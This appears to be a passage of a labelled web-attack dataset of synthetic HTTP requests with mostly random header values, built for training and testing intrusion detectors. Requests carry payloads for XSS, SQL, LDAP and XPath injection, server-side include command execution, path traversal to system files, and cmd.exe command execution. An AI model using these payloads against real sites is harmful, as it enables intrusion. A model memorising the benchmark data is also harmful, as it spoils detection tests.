Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43943
Start - Id: 46734
class: XSS
GET /oeloer07cradhkm.tiff?gyis=8867&7isinintNah=sgc%3En&6behEstT=l7derno&VfVT=ing&fnit=uMbsyscreon&ixedo=neE2TbTRGCMb&taeeorty8na=921&fnos=0WEL%40APD&bSe3bAp7yW5dl=5eSy+&5homeiC3Wl.=3878910040&wsvea3jn=oteetmseorbhf&aeYioogothe=6544153&oo1epnaeGa=99761003&s4xvirieztna=s2 HTTP/1.1
Host: 216.99.76.9:745
Connection: 0croa
Accept: video/*, application/rtf;q=0.4
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: ntufoeby-wesc, icdsltl-dd;q=0.7
Cache-Control: no-cache
Client-ip: 201.132.62.40
Cookie: p6ris=javascript:    alert    (     " Mduee.mir");87FqP5catoId=gwoxmlAlftt)gfghavingte;bwdtd7=Zizxpeee)r2M7n|
Cookie2: $Version="78"
Date: Sun, 06 Aug 06 17:21:28 GMT
ETag: W/"6iD2Nmxi5v5ABb1tw"
Expect: 100-continue
From: Ertclen@yaez.com
If-Modified-Since: Tue, 09 Jun 09 06:37:22 GMT
If-Unmodified-Since: Wed, 26 Aug 09 23:36:31 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9155
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: ojp6r uswliesi=uezLxoo
Range: 112-7,674-5
Referer: http://teyo.org/opam9da/ttst1ebd/nru9eKeo.asp
TE: chunked,trailers
Trailer: If-Match
User-Agent: aiIa (eaE@z_3X_)
UA-CPU: StrongARM
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: compress
Upgrade: nasb/8.9, sn6a/0.6, vss/6.2
Warning: 010 www.a8sa.htm "nmhkcmhseac2rng" "Wed, 04 Jun 08 06:13:20 UTC"
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46734
Start - Id: 39485
class: SSI
POST /euGyN.4VMTi_rrPMED/edeabr/o6imtjyrtt/mhmerH9/aAleacquusgvt/ctrod/edvI82dliJ/9X/bl5Jo03pt/jZ.pl? HTTP/1.1
Content-Length: 294
Content-Language: tie,wie
Content-Encoding: compress
Content-Location: http://trne.be/d803/ggCe.tar.gz
Content-MD5: MXRpZDVhZnhhNXRidGVzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 19:36:37 CET
Last-Modified: Sat, 22 Sep 07 07:39:27 CET
Host: 250.112.251.205
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: lNoneR-a, qes-aaeg
Cache-Control: min-fresh=00
Cookie: 8ted=vTnbsgdti]ihe e;qfKNHPHrT=hl$8;JYZV=<!--#echo var="date_gmt"-->;nnel0nraSbnbiR=aiNOi
Date: Mon, 25 Jul 05 05:25:44 GMT
ETag: "26pPVT5x1F2hD-uem"
If-Unmodified-Since: Wed, 26 Apr 06 01:27:16 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jul 06 07:21:02 CET
Max-Forwards: 1
Pragma: rsips='l'
Proxy-Authorization: NTLM aWViZXBsaXdpZEtlVGVoYW1hYXJlcEFvaW84NzJzdHBlYWlOdHptbTQ=
Authorization: Basic QTc4YW5zYTp5MmFlNEU=
Range: -2,63669-
Referer: http://eeetiuuw.org/aipicNrT/pesficl.swf
TE: deflate;q=0.5
Trailer: Host
User-Agent: Mozilla/1.9 (Windows; U; Windows NT 2.3; me-5e; rv:4.9.7) Gecko/43819050
Via: iiicar/1.0 42.178.87.174:78, dnn/4.5 www.Eordmn.jpeg, HTTP/9.5 www.xnxaf.js
Transfer-Encoding: gzip

as8prlcSrg4=4527476&ttataw=nodebinouhe5n9iims9IO=oTs&urcogptTayilcio=awej4gz1n&tjeo7wev=bWie&stnelfoplemdDna= &mCdzogtona7neSa=hee0GrtiSaa&hf=?an&4nodeDykNOOP=cetlike~incta&r8mdvoe1aa=to&uat=Dsn&tEOrttIlrcTwd='sinsertef&aiRsio=6&Hfb7oU_JraK=8&adminG1CsurNS=s@eVR&V6lL-f=dut nwgeti~0

End - Id: 39485
Start - Id: 45250
class: PathTransversal
GET /../../? HTTP/1.0
Host: www.cvytlna.de
Connection: close
Accept: video/quicktime;q=0.5, image/jpeg;q=0.3, audio/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=85
Client-ip: 225.124.231.31
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="34"
Date: Sun, 03 Jun 07 12:37:16 CET
ETag: W/"3pA2Oqs0aQq0z5fxq"
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Tue, 29 Dec 09 19:41:09 GMT
If-Unmodified-Since: Thu, 07 Jul 05 01:04:26 UTC
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: Sun, 25 Jan 09 09:28:44 UTC
Max-Forwards: 4
MIME-Version: 1.7
Pragma: sli=lctxBCei
Proxy-Authorization: Digest qop=evai40
Authorization: hTw6at eefh3r=mlfF
Range: 220-5761,42620-
Referer: /tonne.php
TE: deflate,trailers,deflate;q=0.1
Trailer: Accept
User-Agent: Mozilla/7.9 (compatible; MSIE 2.3; Unix; snofaGsls; tytha; lRfrhs)
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 2.5 www.avhfaeu.js, 7.6 www.rdOisp.jpeg
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45250
Start - Id: 38853
class: LdapInjection
GET /sencEtenrsreoeja/aioucefotn2c/1Vu7QOHT/dYHN5Ej3rZHiyTsL/tKMuxHxooNHdes/peraTBo4.jpg?BvbscriptfqU=22439992&Lrinwudtth1seR=6ibOsrzm5lE&andgumejDbdeoad=DaHet%29%28%26%28objectClass++++%3D+esci*%29&e6iwwnreEneh17s=massy9d0dr HTTP/1.1
Host: www.2nsk.uk
Connection: close
Accept: image/jpeg;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.6, iso-8859-15, gb2312;q=0.5, iso-8859-7;q=0.8
Accept-Encoding: *
Accept-Language: jpTqadtm-aesoNyre, t-o4s;q=0.8, rd-iphat;q=0.1, or-ovbH
Cache-Control: no-transform
Client-ip: 149.133.119.108
Cookie: _oUauPeMDUR=41
Cookie2: $Version="36"
Date: Fri, 01 Aug 08 11:52:13 UTC
ETag: W/"@7Yjn8ZE2@SsNW_j"
Expect: beeepata=O503do;rmagetie
From: qneeyn@ecwmw.de
If-Modified-Since: Mon, 03 Aug 09 06:33:40 GMT
If-Unmodified-Since: Thu, 14 Oct 04 20:37:29 CET
If-Match: *
If-None-Match: "T4_zXOW8gGRpa2pA"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Ym9pbk1uZWh0MnJzdXZsZXk1dXRETjdlZXlvdG50aEJlcXdzaWNtaWRYbnU=
Range: -8
Referer: http://9Lsi7W.de/ncrqSlir/eeEleea/9jno/smTsmzi/east.cgi
TE: trailers
Trailer: Accept-Language
User-Agent: tHswie
UA-CPU: 68000
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 9.2 www.EmfvseSe.shtml, 5.6 www.utme.png
Transfer-Encoding: gzip
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38853
Start - Id: 35324
class: SqlInjection
GET /7xskiuebR5mo4ea/Trpy/sdV.mdb?Eov=62&TtRsuehh=%3Flpzme39ikoexml&aoargdtk=eessesEEJalai&onnin=einenei4ynoer8eoa&xscript1W5Ol_=qwer%27+++or+++eEb_v.Account%3D%27adeimi%40iaisej.com&porpNv=e3openeiurhteVltyA HTTP/1.0
Host: www.dnfa0a5.uk
Connection: festiTC1
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-age=01
Client-ip: 255.121.91.151
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="54"
Date: Thu, 29 Sep 05 05:47:55 GMT
ETag: W/"7SbYCByy40597oifpLn"
Expect: 100-continue
From: ntpn@oIrer.it
If-Modified-Since: Mon, 20 Apr 09 07:23:10 CET
If-Unmodified-Since: Mon, 08 Dec 08 19:59:25 GMT
If-Match: *
If-None-Match: "oI3z9pxdslHC95lMq"
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 2981
MIME-Version: 4.0
Pragma: e=e
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Digest opaque="5qux6y"
Range: -699332,-7572
Referer: http://wai2oui.be/eedfsey.aspx
TE: trailers
Trailer: If-Range
User-Agent: nugefhlTteuitlactty
UA-CPU: 68000
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: HTTP/6.2 151.185.132.179
Transfer-Encoding: deaz
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35324
Start - Id: 41433
class: SqlInjection
POST /l2YSWwt7Tiqd48Q4@4Td/ue3uilansna/hllFmySeinc4r/xvaeGrhugecdrbTonnr.htm? HTTP/1.1
Content-Length: 142
Content-Language: rxU,8rD
Content-Encoding: deflate
Content-Location: /oeeerofd.exe
Content-MD5: b3R1UmhyaWVEbnRlb2hsbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Fri, 02 Mar 07 22:16:11 UTC
Host: www.1iepA.cz:986
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-15, windows-1254
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="458"
Date: Mon, 02 Apr 07 04:38:48 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 820
MIME-Version: 0.4
Pragma: eVeccvh='tyavS4t0'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest qop=4eBn
Range: -86
Referer: http://hSmdK.ch/rIrcad.gif
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/7.6 (X11; U; Solaris 7.9; ar-rd; rv:9.1.3) Gecko/61027919
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: mposyh; oiree=a4uaahrM
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

oesoatald=266&dtU1ohc9stitghs=hstu m52&7nsaeseuyH=' )  UNION ALL SELECT  2  FROM  7u6lLwhvr WHERE     (  ''  = '&hn9eagxRiqs=825

End - Id: 41433
Start - Id: 49262
class: XPathInjection
GET /3naonlr00wlsAIhcy/oe4aaaeeXczycTssaeo/cmd1B8g/m1urssztaya7tehn/aee/qJYQ1PIEsJ/8Y1NU20flJgPcEO0hLO/tyynduA.js?0APxc=eatasiabeupaeuS9f&m8R2op=7heno%27+++or++++%28i+++%3C++++count%28Wjtr%2Fchild%3A%3Atext%28%29%29+and+++j++%3C+++count%28a0sx2l%2Fchild%3A%3Acomment%28%29%29++and+++k+++++%3C+count%28oldinA%2Fchild%3A%3A*%29++++%29+or++%27Nc%27+++%3D%27++++le%27++++or&2XnLFXFp=anin&jqd=bF1LIyt&uashe=nvartrohomem3&dlioeoponc=rmce+%27%5Bnabody%3Bf+lenull6%3Am&atPUelbuMh0EsTn=j0Bzywf-Z HTTP/1.0
Host: 105.239.121.69
Connection: cril
Accept: */*
Accept-Charset: x-mac-cyrillic, windows-1258, x-mac-arabic;q=0.0
Accept-Encoding: deflate;q=0.5
Accept-Language: gcwa-iebe6r, lRp-ncohmln;q=0.2, is-timn9lr;q=0.2
Cache-Control: max-stale
Client-ip: 175.132.66.53
Cookie: _CYgxs=2;eIC1=e2WDLt;Yraon=8;m1gg=ftB;ds8pare74kdsed=6QvN3
Cookie2: $Version="395"
Date: Tue, 05 Jun 07 20:00:14 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Wed, 18 Nov 09 03:55:34 GMT
If-Unmodified-Since: Wed, 20 May 09 03:32:47 UTC
If-Match: *
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 76
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: Digest uri=/epovu94.php4
Range: 560-83908
Referer: /rhvahgM.pl
TE: gzip;q=0.5
Trailer: TE
User-Agent: hwrste (lskXa_yQ)
UA-CPU: x86
UA-Disp: 2447,4165,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: compress
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49262
Start - Id: 39937
class: SSI
PUT /rsotyeesr/fXSOv/beiBL1orrgs.aspx? HTTP/1.0
Content-Length: 355
Content-Language: 2,heoe,tlddyt
Content-Encoding: compress
Content-Location: /ileuhn/oseionmS/0Meas/eeczo/aii5.tar
Content-MD5: ZmluSXljWmVpbHNhaWxyZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Apr 04 14:03:50 UTC
Last-Modified: Fri, 04 Aug 06 22:32:48 CET
Host: 43.142.139.27
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ornwiOa-0nuaEEn
Cache-Control: no-cache
Client-ip: 241.54.246.2
Cookie: -IV67b=sa;lk-O_=t sle%Achb;n\;ibne8taniiibda=nx8NKbnhw7;Eqeutelhmjh= si;nai0alecoxoo=deototgge
Cookie2: $Version="17"
Date: Wed, 26 Oct 05 20:56:29 UTC
ETag: W/"FUfyGk1ujuNeF.2u"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Mon, 17 Nov 08 06:21:05 CET
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:21:58 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM dG9lbG5vdWJodHNsRWVzbmh5YWVkQWVlbzhzZWxwaXJMZWE3Z2V5cEVkcXVh
Range: 065804-4,-22740,4181-
Referer: /rhby7Os/arri.swf
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 4.2; ld-si; rv:3.3.7) Gecko/76206652
UA-CPU: 68000
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 6.2 31.0.86.28:09, HTTP/9.0 www.e0gt.css
Transfer-Encoding: azsrz
Upgrade: awoh/8.2
Warning: 471 61.54.109.103 "OTamdaleob" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4wrhceo=443415&-xk_6winnt4=where0r &fUes=ayHno seIl5ji&hhttpsw3xfeZ.=opn5ster-$KOle&8sB8i5oabr=76&epmNesaeUn=tzydbAHQFtM7&otxeCauHt=mlas&7ieslwtiOtv=?IEhttpsatAsr reeee&nhAfoRo8tenrdie=srehwebhzen&sM9Tm=144392&tw=nAHBp&eegcnmoc46oil=<!--#exec    cmd="/bin/ls -l     /home/diuEus1tz/e8eagUaeoa"     -->&34gahpmar=gDAns6jx49&oo=7

End - Id: 39937
Start - Id: 43906
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 17.149.211.110
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: identity;q=0.8, compress, compress, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Sun, 01 Jan 06 15:13:46 CET
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: aneerIi4
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "bg@kYjpoQExGydxa4FQ2"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: Tue, 07 Apr 09 08:41:41 UTC
Max-Forwards: 92
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: /tz7s3au/frreayN/nazd.pdf
TE: trailers,trailers
Trailer: If-Match
User-Agent: rdo4tepNorel
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 0.3 www.yrsua.jpeg, 3.9 173.211.149.174:45562, 8.5 www.TEtoh.png
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43906
Start - Id: 45635
class: PathTransversal
GET /gT/e-cb3xiCu/lvPTnSwdz5P5ZG/aw/cbKftpjB.xp_10stdinQ/Cwindow.open0g6NninputX.png?quRpilrA7ez4=sv&qelshgjhbeakipr=ca1yHmOx7_U&sg=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&e6hmlwyerof=gesIinltopn HTTP/1.0
Host: 49.254.174.136
Connection: onnottso
Accept: */*
Accept-Charset: windows-1250;q=0.4, x-mac-icelandic;q=0.7, windows-874, macintosh;q=0.5, euc-kr;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: l08tr60-sli, ydRho-guEu;q=0.4, scsa-nDtbUn;q=0.6
Cache-Control: no-transform
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Tue, 06 Dec 05 03:17:46 CET
ETag: "PKvFDYVY3-cjVvQ"
Expect: Ylhtncs
From: goqp9c@mhshz.org
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Thu, 01 May 08 03:33:18 UTC
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: "yeVFiT5pXsOY.0tcI"
If-Range: *
Max-Forwards: 3719
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic aWFyYjk6dFlodw==
Range: -5753
Referer: /st1Webnr/meey9i/omhvci/c6nnsbkp/tInnsWpd.avi
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.1 (compatible; Konqueror/5.6; Solaris; eeXa0o5eh)
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 7.9 219.188.67.11
Transfer-Encoding: identity
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45635
Start - Id: 35455
class: SqlInjection
POST /a1xn/catRsEfIIvar/tyrhenonhbmepeurmhhm/eAiatetwet0edr/eT24c/ns9odlzRnSlnetio/harruonr9/ssLiQvtKPLdhw.jpeg? HTTP/1.1
Content-Length: 249
Content-Language: f,amGEfqT,eeeaziiE
Content-Encoding: identity
Content-MD5: ZWZ1dG51QWVuZGNjYWRtUg==
Content-Type: application/x-www-form-urlencoded
Host: www.typassue.cz
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: euc-tw;q=0.2
Accept-Encoding: gzip, gzip;q=0.8, gzip;q=0.7
Cache-Control: max-stale=7
Client-ip: 158.176.162.21
Cookie: elsa='    )   UN/**/ION     ALL  SEL/**/ECT   'rqojnttjr',0,98984,'plun',9   FROM  yier   WHERE (   ''=    '
Date: Thu, 23 Jun 05 21:40:06 UTC
Expect: bfTo
If-Match: "-uJ0jswgUJgSMDm"
Max-Forwards: 6
MIME-Version: 2.9
Pragma: no-cache
Referer: /euli/deje0tvR/tortq/udVabp/zp7qd.pdf
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.3; 4s-ge; rv:3.4.5) Gecko/39586771
Transfer-Encoding: identity

UFVAL-Rk=cQmt4qmyF&paioe9=eLIT6pAcx&esen=et&Ucfeo=eex W> e&@samJinsert6Yjkwinnt=o~sVi&VE3ByLr0Dnl=2562190&elen4l8yrsodroh=uaA&ee680Ar=Tlm inh~&LeeiblWnfteme=76KutXzJ&EtqElikeEs=9&thnegw1=81gnt&Eodjenre=j6s&Th7zeilvvuse=iwp-h&3q=s10eepftyertset

End - Id: 35455
Start - Id: 40731
class: SSI
GET /tNe7VdavyxO3Zw/ddRpZk3yrY6gYskg5/J2YVXDg-7XSx/jsVg@mailtO.bin? HTTP/1.1
Host: www.e9onfn.org
Connection: keep-alive
Accept: video/*, video/*;q=0.8, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-c, kUig5-eebje;q=0.5, qoToiek-sae
Cache-Control: no-transform
Client-ip: 107.167.112.171
Cookie: kIt5su=i@;nnHqOwenAl=stdin;qc3lbrgcroW=q@m
Cookie2: $Version="64"
Date: Tue, 01 Jan 08 10:54:39 UTC
Expect: 0oithstu
If-Unmodified-Since: Thu, 09 Nov 06 10:18:36 GMT
If-Match: *
If-None-Match: "jc6emouYQ14ktmVQpM_x"
If-Range: Thu, 08 Apr 10 10:13:09 GMT
Max-Forwards: 9000
Pragma: sSley04c=i3
Proxy-Authorization: Digest qop=epWbboe
Authorization: Basic c1V0eVc6ZW5UYXNz
Range: 7-43,840701-
Referer: /uddnmlts/shebmt2l/ownr/nyEIe.asp
TE: chunked;q=0.9,gzip;q=0.6,trailers
User-Agent: <!--   #odbc     connect="aohTAha,1Uag,LOsFa"      statement="select    *   from    o4rab"-->
Via: 8.5 www.lierans.htm, HTTP/9.6 216.1.194.104, 0.7 www.te0uhn.html
Transfer-Encoding: compress
X-Forwarded-For: 168.72.228.20
----: ----------------

null

End - Id: 40731
Start - Id: 41029
class: SqlInjection
GET /T1dhseudtesT/IhttpsZPlocationhtaccesOBlog/eeighzvm/hsei8xue/dCmoA/akj/a9/8t3mislsem6m4tiso/AUh4JFS4Fe50G.aspx?logV5v=8995029&@4-qr-bQi=0573654&rEsiretNtb95=4&acceptM5JIW7=%5B&2ite=2%3Ca+&llsoioea9whue=saeUadtp-Fpassthruwheree&orMxE0L2U=rh%274+7al+8nt&.dQperltelnetQWi8Z=t%3Eel%26E%3F%2Fe6&oea=4145411&rt=%286&0lggayadt=bulk+insert+++3Uqu++++from+++++%27pwdump.exe%27+++++++++with++++%28codepage%3D%27RAW%27++++%29&dsec4ctqtvgiis8=24s%40unz67jM&@W1R6having=s7%40nUk HTTP/1.0
Host: www.9nelehy5.com:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.5
Accept-Encoding: deflate;q=0.3, deflate, compress;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 2.230.114.150
Cookie: rrplike@passwdjY=2Qdnmj.;jtls=hi1;rsiMiR6itAAhts=(eliftp;eeAinz=133019;ui6welinr=nXfBz-e-;nMidmiuQ50e=ynldcuxinirSxtdB
Cookie2: $Version="1"
Date: Sat, 30 Jul 05 23:33:10 CET
ETag: W/"e8h6IKFwFygF.9A6w624"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 23 Nov 04 05:32:03 CET
If-Match: *
If-None-Match: "gGGDYPMk-9ma22OqoT"
If-Range: "sH_uqNUxLh_eR52wUKe"
Max-Forwards: 196
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 770-,-93926
Referer: http://www.fToosde9.it/yifd/tdhx.png
TE: gzip;q=0.1,deflate;q=0.3
User-Agent: Rsaym7tsacboaanaat
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: dlbsd/2.7 45.187.138.214
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 757 www.ISNmy.shtml "drueynihhx3tslbrems" "Tue, 22 Sep 09 13:07:10 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41029
Start - Id: 49231
class: XPathInjection
GET /lf5Lqp5@KI0T/aVVS7rozs0/onev/sU_m7Ijik/orw1i6cvehlf4Hg/5U3nearciIn/a2/oCunaso/dTc@StwsHoaeKeUSnP5f/ee8orrnmb5S2bev94/qnnHoBauTo0iPemsa.jpg?aoottnaii=ohmesD%27++or+++++6+++++%3C+++count%28path%2Fchild%3A%3A*%29++++or+++++%27tl%27+++%3D+++%27&ztawlftEDtp=b_19jarppi&plrdcdfd=rnesa6lVT HTTP/1.0
Host: www.j8tdtte.fr
Connection: close
Accept: application/*
Accept-Charset: isiri-3342, windows-1254;q=0.9, iso-2022-jp;q=0.0, iso-8859-6
Accept-Encoding: deflate;q=0.9, compress;q=0.7
Accept-Language: iteEee-aMhmds, dWNUdS-lxr, 3u6i2te-Hnc;q=0.5, wtdRo-blreo;q=0.2
Cache-Control: only-if-cached
Client-ip: 63.155.44.179
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Mon, 26 Apr 10 19:00:35 UTC
ETag: "vpaJWhlnEKS-Lv1_1z"
Expect: 100-continue
From: hi2H@ura3sfneT.ch
If-Modified-Since: Fri, 26 Sep 08 07:49:30 UTC
If-Unmodified-Since: Fri, 21 Aug 09 16:25:01 UTC
If-Match: "IiwbT6McNTNS2gLTg"
If-None-Match: "0UUNAksE_nQ6y9_"
If-Range: *
Max-Forwards: 2159
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM cmhlaWR0dHRpcDBjZWV5YXpMZ2Zpd3lXaGVkbW5zZmVvU29hcXNOOXR0ZDA=
Authorization: lrtk2e iuti=tps7h
Range: -628
Referer: http://www.ej3e.org/hndoaa0/4osd8/atuRmhpp/syxewe.exe
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: ta1a-EsB http://www.rietiR.com
UA-CPU: Sparc
